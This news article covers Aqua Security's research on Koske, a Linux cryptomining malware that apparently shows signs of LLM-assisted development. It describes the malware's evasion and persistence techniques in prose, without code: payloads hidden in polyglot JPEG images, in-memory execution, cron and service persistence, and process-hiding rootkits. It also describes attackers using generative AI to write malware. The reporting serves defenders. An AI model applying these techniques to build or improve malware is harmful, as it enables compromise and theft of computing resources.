Koske Marks a Significant Step in AI-Created Malware: Aqua Security
A sophisticated new Linux cryptomining malware dubbed “Koske” is offering security teams a taste of what’s on the horizon as threat actors become more proficient with generative AI.
Koske shows an “unsettling shift” in AI-generated malware that is nearing the point where it is as good or better than that built by humans and includes advantages that AI brings to malware development, according to Assaf Morag, director of security research at Aqua Security.
“The line between human and machine-generated threats is starting to blur,” Morag wrote in a recent report, adding that Koske “shows clear signs of AI-assisted development, likely with help from a large language model [LLM]. With modular payloads, evasive rootkits, and delivery through weaponized image files, Koske represents a new breed of persistent and adaptable malware built for one purpose: cryptomining. It is a warning of what is to come.”
The introduction of generative into the mainstream with the release of ChatGPT by OpenAI in November 2022 set off an AI-vs.-AI confrontation in the cybersecurity field, with vendors injecting the rapidly evolving technology into their security and protection products and services and bad actors embracing it for their nefarious activities.
AI a Mixed Bag for Hackers – For Now
For cybercriminals, generative AI can be used to lower the barrier to entry by enabling automated development of malicious code and improved evasion and information gathering techniques. That said, there also are challenges, including gaining the necessary expertise to create AI systems and high-quality data that can be used to train models.
“Developing malware to exploit vulnerabilities takes time, effort, and expertise,” security firm CyberArk wrote in a report late last year. “Given the aptitude that generative AIs have for writing code, it’s no surprise that threat actors are using them to do exactly that. Of course, as with most content a generative AI puts out, the first draft of that malicious code will likely be quite rough around the edges. But it’s a start – and it still lowers the gateway to entry for new threat actors – and makes experienced hackers more efficient.”
Even more alarming is that threat actors can use generative AI to more easily create polymorphic malware that can adapt and change as the situation evolves, which CyberArk – which is being bought by Palo Alto Networks for $25 billion – wrote “will also continue to complicate matters for enterprise antivirus systems.”
According to Gartner analysts, attackers will increasingly use AI tools and LLMs for large-scale social engineering attacks, adding that by 2027, 17% of all cyberattacks and data leaks will involve generative AI.
AI-Boosted Evasion and Persistence
Aqua’s Morag wrote that Koske’s operators begin their attack by exploiting a misconfigured server, installing backdoors, and downloading to “seemingly harmless JPEG images from shortened URLs. These images are polyglot files, with malicious payloads appended to the end. Once downloaded, the malware extracts and executes the malicious segments in memory, bypassing antivirus tools.”
The malware also includes what he said are “unusual” evasion and persistence techniques that are “boosted” by AI and can be used to exploit misconfigurations or vulnerabilities, he wrote. They include shell configuration hijacking, system boot manipulation, cron jobs that schedule tasks every 30 minutes and on reboot, and dedicated system services that puts in a self-starting downloader and execution manager.
“Main and secondary payloads are delivered via dual-use image files,” Morag wrote. “The threat actors append malicious shell scripts to legitimate image files (e.g., panda bear pictures), which are hidden inside images and kept on legitimate and free image storage platforms (freeimage, postimage and OVH images).”
The technique – a “sneaky form” of polyglot file abuse or malicious file embedding – includes a valid JPG file with malicious shellcode hidden at the end, and only the last bytes are downloaded and executed, he wrote.
The file blends image data with executable payloads to evade detection, and another payload is downloaded and extracted from an image of a panda ear that aims to hide files, directories, and processes from monitoring tools through the filtering of entries based on specific names or a PID read. There also are networking and DNS evasion tactics.
Bring in the LLM
AI-like behavior and adaptation include tri-layer connectivity checks to verify access to GitHub, remediation steps, and proxy brute force tactics for dynamically discovering working proxies through GitHub lists by testing SOCKS5 and HTTP proxies at the same time. Koske supports 18 cryptocurrencies and deploys CPU- and GPU-optimized miners the capabilities of the host.
There also are signs in the malware script that points to the use of a LLM, including verbose and well-constructed comments, logic flow with defensive scripting, and obfuscated authorship by using Serbian phrases and neutralized syntax.
“While using AI to generate better code already poses a challenge for defenders, it’s only the beginning,” Morag wrote. “The real game-changer is AI-powered malware, which is malicious software that dynamically interacts with AI models to adapt its behavior in real-time. This kind of capability could mark a meteoric leap in adversaries’ tactics, putting countless systems at serious risk.”
